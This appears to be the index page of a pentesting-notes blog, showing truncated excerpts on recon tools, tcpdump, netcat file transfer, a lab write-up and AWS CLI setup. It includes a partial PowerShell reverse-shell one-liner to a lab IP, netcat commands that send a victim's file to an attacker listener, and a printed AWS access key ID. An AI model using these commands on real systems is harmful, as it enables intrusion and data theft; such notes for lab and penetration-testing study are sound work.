Shuciran Pentesting Notes

Social Media

Social-Searcher: useful resource to gather info from several social networks: Social-Searcher
Twofi: scans a user's Twitter feed and generates a personalized wordlist used for password attacks again...

Recon-ng

To get started, let's simply run recon-ng:
kali@kali:~$ recon-ng
[*] Version check disabled.
/\ / \\ /\ Spon...

Domain Enumeration Gathering

Security Headers: analyzes HTTP response headers and provides a basic analysis of the target site's security posture: Security Headers
SSL Server Test: analyzes a server's SSL/TLS configuration and compa...

Powershell Reverse Shell

Reverse Shell: powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("10.10.16.2", 1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($...

Tcpdump

Read a pcap (-r reads a file): sudo tcpdump -r password_cracking_filtered.pcap
Capture traffic (-i chooses the interface): sudo tcpdump -i tun0 icmp
Filter by src/dst host: tcpdump -n <src/dst> host 1...

Netcat File Transfer

Transfer File: on the victim (Windows) machine, pipe the file's contents into netcat towards the listener on the attacking machine: type .\out.txt | .\nc.exe -nv 10.10.16.2 443
Then, on the listener, redirect the incoming traffic to the destination file: nc...

Netcat File Transfer

Transfer File: from the attacking machine, send the file's contents to the netcat listener on the victim machine: nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe
Then, on the listener, redirect the incoming traffic to...

Common Commands

mkdir: mkdir -p {content,exploits,nmap}
Reload zsh: useful command to reload zsh when it is modified (alias, keys, etc.): source ~/.zshrc
Pyenv: pyenv install <version>, pyenv versions, pyenv gl...

Epsilon (Medium)

Contents: Git source retrieval with GitHacker; AWS enumeration; Lambda function enumeration; authentication bypass abusing JWT; Server Side Template Injection (SSTI); Tar symlink exploitati...

AWS CLI

AWS Configuration: how to configure the aws CLI to get access to its functions:
❯ aws configure
AWS Access Key ID [****************6TDC]: AQLA5M37BDN6FJP76TDC
AWS Secret Access Key [****************Fo1A]: ...